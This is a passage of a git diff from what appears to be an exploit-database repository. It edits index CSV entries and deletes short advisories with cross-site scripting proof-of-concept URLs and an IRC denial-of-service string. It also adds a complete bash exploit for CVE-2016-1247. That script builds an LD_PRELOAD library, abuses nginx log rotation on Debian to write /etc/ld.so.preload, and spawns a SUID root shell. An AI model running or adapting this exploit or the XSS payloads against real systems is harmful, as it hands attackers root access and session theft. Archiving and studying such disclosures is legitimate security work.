6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80 @@ -33411,7 +33394,7 @@ id,file,description,date,author,platform,type,port 34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk - product_details.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me - 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 -34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (Red Hat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 +34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php img Parameter' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 @@ -33964,7 +33947,7 @@ id,file,description,date,author,platform,type,port 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 +35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 @@ -34407,7 +34390,7 @@ id,file,description,date,author,platform,type,port 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 36102,platforms/php/webapps/36102.txt,"Mambo Component 'com_n-gallery' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 -36103,platforms/php/webapps/36103.txt,"Mambo Component 'com_ahsshop' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36103,platforms/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0 36106,platforms/php/webapps/36106.txt,"Mambo Component 'com_n-press' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0 @@ -35138,9 +35121,7 @@ id,file,description,date,author,platform,type,port 37162,platforms/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37166,platforms/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps,0 -37173,platforms/php/webapps/37173.txt,"Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37174,platforms/php/webapps/37174.txt,"WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37175,platforms/php/webapps/37175.txt,"Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37176,platforms/php/webapps/37176.txt,"Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37177,platforms/php/webapps/37177.txt,"WordPress Plugin CataBlog 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37178,platforms/php/webapps/37178.txt,"Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -36774,7 +36755,7 @@ id,file,description,date,author,platform,type,port 40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting",2016-10-28,LiquidWorm,php,webapps,0 40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0 40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0 -40637,platforms/php/webapps/40637.txt,"Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80 +40637,platforms/php/webapps/40637.txt,"Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80 40650,platforms/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,php,webapps,0 40671,platforms/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,php,webapps,0 40682,platforms/php/webapps/40682.txt,"Alienvault OSSIM/USM 5.3.1 - PHP Object Injection",2016-11-02,"Peter Lapp",php,webapps,0 @@ -36793,7 +36774,6 @@ id,file,description,date,author,platform,type,port 40723,platforms/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security Team",php,webapps,0 40724,platforms/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",php,webapps,80 40725,platforms/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,php,webapps,0 -40739,platforms/php/webapps/40739.txt,"WordPress Plugin XCloner 3.1.5 - Multiple Vulnerabilities",2016-11-08,"Felipe Molina",php,webapps,0 40732,platforms/php/webapps/40732.txt,"WordPress Plugin 404 to 301 2.2.8 - Persistent Cross-Site Scripting",2016-11-08,"Alyssa Milburn",php,webapps,80 40733,platforms/php/webapps/40733.txt,"WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting",2016-11-08,"Burak Kelebek",php,webapps,80 40742,platforms/windows/webapps/40742.txt,"Adobe Connect 9.5.7 - Cross-Site Scripting",2016-11-09,Vulnerability-Lab,windows,webapps,0 diff --git a/platforms/asp/webapps/31786.txt b/platforms/asp/webapps/31786.txt deleted file mode 100755 index 8959a8e8d..000000000 --- a/platforms/asp/webapps/31786.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/29191/info - -Cisco BBSM (Building Broadband Service Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. - -Cisco BBSM 5.3 is vulnerable; other versions may also be affected. - -http://www.example.com/ekgnkm/AccessCodeStart.asp?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/5286.txt b/platforms/asp/webapps/5286.txt similarity index 100% rename from platforms/php/webapps/5286.txt rename to platforms/asp/webapps/5286.txt diff --git a/platforms/linux/local/40768.sh b/platforms/linux/local/40768.sh new file mode 100755 index 000000000..e7083eaff --- /dev/null +++ b/platforms/linux/local/40768.sh @@ -0,0 +1,231 @@ +#!/bin/bash +# +# Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html +# +# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit +# nginxed-root.sh (ver. 1.0) +# +# CVE-2016-1247 +# +# Discovered and coded by: +# +# Dawid Golunski +# dawid[at]legalhackers.com +# +# https://legalhackers.com +# +# Follow https://twitter.com/dawid_golunski for updates on this advisory. +# +# --- +# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu +# etc.) to escalate their privileges from nginx web server user (www-data) to root +# through unsafe error log handling. +# +# The exploit waits for Nginx server to be restarted or receive a USR1 signal. +# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx) +# script which is called daily by the cron.daily on default installations. +# The restart should take place at 6:25am which is when cron.daily executes. +# Attackers can therefore get a root shell automatically in 24h at most without any admin +# interaction just by letting the exploit run till 6:25am assuming that daily logrotation +# has been configured. +# +# +# Exploit usage: +# ./nginxed-root.sh path_to_nginx_error.log +# +# To trigger logrotation for testing the exploit, you can run the following command: +# +# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx +# +# See the full advisory for details at: +# https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html +# +# Video PoC: +# https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html +# +# +# Disclaimer: +# For testing purposes only. Do no harm. +# + +BACKDOORSH="/bin/bash" +BACKDOORPATH="/tmp/nginxrootsh" +PRIVESCLIB="/tmp/privesclib.so" +PRIVESCSRC="/tmp/privesclib.c" +SUIDBIN="/usr/bin/sudo" + +function cleanexit { + # Cleanup + echo -e "\n[+] Cleaning up..." + rm -f $PRIVESCSRC + rm -f $PRIVESCLIB + rm -f $ERRORLOG + touch $ERRORLOG + if [ -f /etc/ld.so.preload ]; then + echo -n > /etc/ld.so.preload + fi + echo -e "\n[+] Job done. Exiting with code $1 \n" + exit $1 +} + +function ctrl_c() { + echo -e "\n[+] Ctrl+C pressed" + cleanexit 0 +} + +#intro + +cat <<_eascii_ + _______________________________ +< Is your server (N)jinxed ? ;o > + ------------------------------- + \ + \ __---__ + _- /--______ + __--( / \ )XXXXXXXXXXX\v. + .-XXX( O O )XXXXXXXXXXXXXXX- + /XXX( U ) XXXXXXX\ + /XXXXX( )--_ XXXXXXXXXXX\ + /XXXXX/ ( O ) XXXXXX \XXXXX\ + XXXXX/ / XXXXXX \__ \XXXXX + XXXXXX__/ XXXXXX \__----> + ---___ XXX__/ XXXXXX \__ / + \- --__/ ___/\ XXXXXX / ___--/= + \-\ ___/ XXXXXX '--- XXXXXX + \-\/XXX\ XXXXXX /XXXXX + \XXXXXXXXX \ /XXXXX/ + \XXXXXX > _/XXXXX/ + \XXXXX--__/ __-- XXXX/ + -XXXXXXXX--------------- XXXXXX- + \XXXXXXXXXXXXXXXXXXXXXXXXXX/ + ""VXXXXXXXXXXXXXXXXXXV"" +_eascii_ + +echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n" +echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m" + +# Args +if [ $# -lt 1 ]; then + echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" + echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" + exit 3 +fi + +# Priv check + +echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m" +id | grep -q www-data +if [ $? -ne 0 ]; then + echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n" + exit 3 +fi + +# Set target paths +ERRORLOG="$1" +if [ ! -f $ERRORLOG ]; then + echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n" + exit 3 +fi + +# [ Exploitation ] + +trap ctrl_c INT +# Compile privesc preload library +echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" +cat <<_solibeof_>$PRIVESCSRC +#define _GNU_SOURCE +#include +#include +#include +#include + #include + #include + #include + +uid_t geteuid(void) { + static uid_t (*old_geteuid)(); + old_geteuid = dlsym(RTLD_NEXT, "geteuid"); + if ( old_geteuid() == 0 ) { + chown("$BACKDOORPATH", 0, 0); + chmod("$BACKDOORPATH", 04777); + unlink("/etc/ld.so.preload"); + } + return old_geteuid(); +} +_solibeof_ +/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" +if [ $? -ne 0 ]; then + echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." + cleanexit 2; +fi + + +# Prepare backdoor shell +cp $BACKDOORSH $BACKDOORPATH +echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" + +# Safety check +if [ -f /etc/ld.so.preload ]; then + echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." + exit 2 +fi + +# Symlink the log file +rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG +if [ $? -ne 0 ]; then + echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." + cleanexit 3 +fi +echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`" + +# Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered +curl http://localhost/ >/dev/null 2>/dev/null +# Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily +# rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am) +echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..." +while :; do + sleep 1 + if [ -f /etc/ld.so.preload ]; then + echo $PRIVESCLIB > /etc/ld.so.preload + rm -f $ERRORLOG + break; + fi +done + +# /etc/ld.so.preload should be owned by www-data user at this point +# Inject the privesc.so shared library to escalate privileges +echo $PRIVESCLIB > /etc/ld.so.preload +echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`" +echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" +echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" +chmod 755 /etc/ld.so.preload + +# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) +echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" +sudo 2>/dev/null >/dev/null + +# Check for the rootshell +ls -l $BACKDOORPATH +ls -l $BACKDOORPATH | grep rws | grep -q root +if [ $? -eq 0 ]; then + echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" + echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m" +else + echo -e "\n[!] Failed to get root" + cleanexit 2 +fi + +rm -f $ERRORLOG +echo > $ERRORLOG + +# Use the rootshell to perform cleanup that requires root privilges +$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" +# Reset the logging to error.log +$BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`" + +# Execute the rootshell +echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" +$BACKDOORPATH -p -i + +# Job done. +cleanexit 0 \ No newline at end of file diff --git a/platforms/multiple/dos/31477.txt b/platforms/multiple/dos/31477.txt deleted file mode 100755 index 7e312c7da..000000000 --- a/platforms/multiple/dos/31477.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/28413/info - -The 'snircd' and 'ircd' daemons are prone to a remote denial-of-service vulnerability because the application fails to properly sanitize user-supplied input. - -Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users. - -This issue affects versions up to and including 'snircd' 1.3.4 and 'ircu' 2.10.12.12. - -/mode nickname i i i i i i i i i i i i i i i r r r r s \ No newline at end of file diff --git a/platforms/php/webapps/22276.txt b/platforms/php/webapps/22276.txt deleted file mode 100755 index 170d63598..000000000 --- a/platforms/php/webapps/22276.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/6916/info - -It has been reported that Nuked-Klan beta 1.3 is prone to cross site scripting attacks. The problem occurs in the 'Team', 'News', and 'Liens' modules which fails to sufficiently sanitize user-supplied HTML and script code located in URI parameters. - -This vulnerability was reported for Nuked-Klan beta 1.3; earlier versions may also be affected. - -http://www.example.org/index.php?file=Team&op= - -http://www.example.org/index.php?file=News&op= - -http://www.example.org/index.php?file=Liens&op= \ No newline at end of file diff --git a/platforms/php/webapps/23666.txt b/platforms/php/webapps/23666.txt deleted file mode 100755 index 9f3303a14..000000000 --- a/platforms/php/webapps/23666.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/9609/info - -A vulnerability has been reported to exist in JShop E-Commerce that may allow a remote user to execute HTML or script code in a user's browser. - -The issue is reported to exist due to improper sanitizing of user-supplied data. It has been reported that HTML and script code may be parsed via a URI parameter of the 'search.php' script. This vulnerability makes it possible for an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the site. - -search.php?xSearch=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscrip%3E&submit=Search \ No newline at end of file diff --git a/platforms/php/webapps/24396.txt b/platforms/php/webapps/24396.txt deleted file mode 100755 index a5b1b1dcf..000000000 --- a/platforms/php/webapps/24396.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/11003/info - -Reportedly the JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'page.php' script. This issue is due to a failure of the application to properly santitize user-supplied input. - -As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -http://www.example.com/page.php?xPage= \ No newline at end of file diff --git a/platforms/php/webapps/25073.txt b/platforms/php/webapps/25073.txt deleted file mode 100755 index eaa38934b..000000000 --- a/platforms/php/webapps/25073.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/12403/info - -JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'product.php' script. - -As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -product.php?xSec=1&xProd=7"> - -product.php?xSec=1">&xProd=7 \ No newline at end of file diff --git a/platforms/php/webapps/27148.txt b/platforms/php/webapps/27148.txt deleted file mode 100755 index f712b3ba2..000000000 --- a/platforms/php/webapps/27148.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/16424/info - -Nuked-klaN is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. - -An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -http://www.example.com/index.php?file=Members&letter=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/29055.txt b/platforms/php/webapps/29055.txt deleted file mode 100755 index a2a979eb5..000000000 --- a/platforms/php/webapps/29055.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/21134/info - -Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. - -An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/[path]/admin/articles.php?edit=">< \ No newline at end of file diff --git a/platforms/php/webapps/29056.txt b/platforms/php/webapps/29056.txt deleted file mode 100755 index b039a0ac3..000000000 --- a/platforms/php/webapps/29056.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/21134/info - -Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. - -An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/[path]/admin/comments.php?edit=">< \ No newline at end of file diff --git a/platforms/php/webapps/29057.txt b/platforms/php/webapps/29057.txt deleted file mode 100755 index aa4157fe9..000000000 --- a/platforms/php/webapps/29057.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/21134/info - -Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. - -An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/[path]/admin/users.php?add=">< \ No newline at end of file diff --git a/platforms/php/webapps/30752.txt b/platforms/php/webapps/30752.txt deleted file mode 100755 index b54eefe07..000000000 --- a/platforms/php/webapps/30752.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/26408/info - -Eggblog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks. - -Eggblog 3.1.0 is vulnerable; other versions may also be affected. - -http://www.example.com/home/rss.php/ \ No newline at end of file diff --git a/platforms/php/webapps/30769.txt b/platforms/php/webapps/30769.txt deleted file mode 100755 index 4e76641a9..000000000 --- a/platforms/php/webapps/30769.txt +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/26458/info - -Nuked-Klan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. - -Nuked-Klan 1.7.5 is vulnerable; other versions may also be affected. - -Exploit XSS: -The GET variable 'file' has been set to: -';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88 ,83,83))//-->">'> - -Proof-of-concpet URI: -http://www.example.com/index.php?file=News%3CScRiPt%20%0a%0d%3Ealert(1121436095)%3B%3C/ScRiPt%3E diff --git a/platforms/php/webapps/31556.txt b/platforms/php/webapps/31556.txt deleted file mode 100755 index 4f10bef2f..000000000 --- a/platforms/php/webapps/31556.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/28500/info - -CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. - -Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. - -http://www.example.com/[path]//pages/showtemplates.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31557.txt b/platforms/php/webapps/31557.txt deleted file mode 100755 index 6b18ac176..000000000 --- a/platforms/php/webapps/31557.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/28500/info - -CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. - -Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. - -http://www.example.com/[path]//pages/editmailinglist_step1.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31558.txt b/platforms/php/webapps/31558.txt deleted file mode 100755 index bbcfef095..000000000 --- a/platforms/php/webapps/31558.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/28500/info - -CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. - -Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. - -http://www.example.com/[path]/page/showcirculation.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31559.txt b/platforms/php/webapps/31559.txt deleted file mode 100755 index a26336fad..000000000 --- a/platforms/php/webapps/31559.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/28500/info - -CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. - -Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. - -http://www.example.com/[path]/pages/edittemplate_step2.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31560.txt b/platforms/php/webapps/31560.txt deleted file mode 100755 index 90fcead46..000000000 --- a/platforms/php/webapps/31560.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/28500/info - -CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. - -Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. - -http://www.example.com/[path]//pages/showfields.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31561.txt b/platforms/php/webapps/31561.txt deleted file mode 100755 index 6cd69a959..000000000 --- a/platforms/php/webapps/31561.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/28500/info - -CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. - -Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. - -http://www.example.com/[path]//pages/showuser.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31718.txt b/platforms/php/webapps/31718.txt deleted file mode 100755 index 02549e15f..000000000 --- a/platforms/php/webapps/31718.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/29005/info - -phpAddressBook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. - -phpAddressBook 2.0 is vulnerable; other versions may also be affected. - -http://www.example.com/pad/?username="<[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37173.txt b/platforms/php/webapps/37173.txt deleted file mode 100755 index eff9056c0..000000000 --- a/platforms/php/webapps/37173.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/53514/info - -The Download Monitor plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. - -An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -Download Monitor 3.3.5.4 is vulnerable; other versions may also be affected. - -http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addtags="> -http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addthumbnail="> -http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=downloads&s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37175.txt b/platforms/php/webapps/37175.txt deleted file mode 100755 index 6adad973f..000000000 --- a/platforms/php/webapps/37175.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/53517/info - -The Download Manager plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -Download Manager 2.2.2 